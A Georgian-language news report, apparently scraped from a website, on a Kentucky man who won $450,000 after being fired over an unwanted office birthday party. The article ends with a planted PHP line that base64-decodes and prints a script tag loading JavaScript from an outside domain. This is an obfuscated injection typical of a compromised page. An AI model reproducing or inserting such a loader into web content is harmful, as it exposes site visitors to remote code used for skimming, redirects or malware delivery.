celsiusi
ავერსი საქკაბელი
აშშ-ში, კენტუკის შტატში, ამერიკელმა მამაკაცმა კომპანიას, რომელშიც მუშაობდა დაბადების დღის წვეულიების ორგანიზებისთვის სასამართლოში უჩივლა. სასამართლომ სარჩელი დააკმაყოფილა, რის შედეგადაც მომჩივანი $450,000-ს მიიღებს. - ამის შესახებ BBC წერს.
 
გამოცემის იუწყება, რომ მამაკაცმა უშუალო ხელმძღვანელს სთხოვა, მისი დაბადების დღე, სხვა თანამშრომლების დაბადების დღეების მსგავსად, წვეულებით არ აღენიშნათ, რადგან შფოთვითი აშლილობა აქვს და ეს მასში სტრესს გამოიწვევდა.
 
თანამშრომლებმა მისი თხოვნა არ გაითვალისწინეს და კომპანიაში კაცის დაბადების დღე მაინც აღნიშნეს, რასაც მისი პანიკური შეტევა მოჰყვა. მან შენობა დატოვა და ლანჩი, რომლისთვისაც ემზადებოდა, საკუთარ ავტომობილში მიირთვა. მოგვიანებით, სამუშაო ადგილზე დაბრუნებულ კაცს თანამშრომლები დაუპირისპირდნენ და უთხრეს, რომ „პატარა გოგოსავით მოიქცა“ და სხვებს „სიხარული ჩააშხამა“. რამდენიმე დღეში, კაცი სამსახურიდან გაათავისუფლეს.
 
სასამართლომ კომპანიას კაცისთვის, ემოციური სტრესის გამო, $300,000-ს გადახდა დააკისრა, $150,000 კი დაკარგული ხელფასის ასანაზღაურებლად.
877
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");